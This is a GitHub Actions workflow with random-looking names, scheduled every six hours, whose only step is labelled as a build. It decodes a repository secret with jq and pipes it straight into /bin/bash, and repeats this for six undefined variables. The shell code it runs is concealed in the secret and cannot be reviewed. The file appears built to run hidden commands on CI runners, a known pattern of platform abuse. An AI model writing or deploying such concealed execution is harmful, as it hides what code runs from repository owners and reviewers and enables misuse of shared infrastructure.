name: gelubang0987

on:
  workflow_dispatch:
  schedule:
    - cron: '51 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: gelubang0987
        env:
          cmtn685: ${{ secrets.cmtn685 }}
        run: |
          echo $cmtn685 | jq -r .dhpl520 | /bin/bash
          echo $vq8 | jq -r .oago7896 | /bin/bash
          echo $rptv725 | jq -r .fat0 | /bin/bash
          echo $a51 | jq -r .uvyqj6 | /bin/bash
          echo $tqn054 | jq -r .ycrl6 | /bin/bash
          echo $osz40 | jq -r .ldg537 | /bin/bash
          echo $gga5445 | jq -r .ezzs4 | /bin/bash

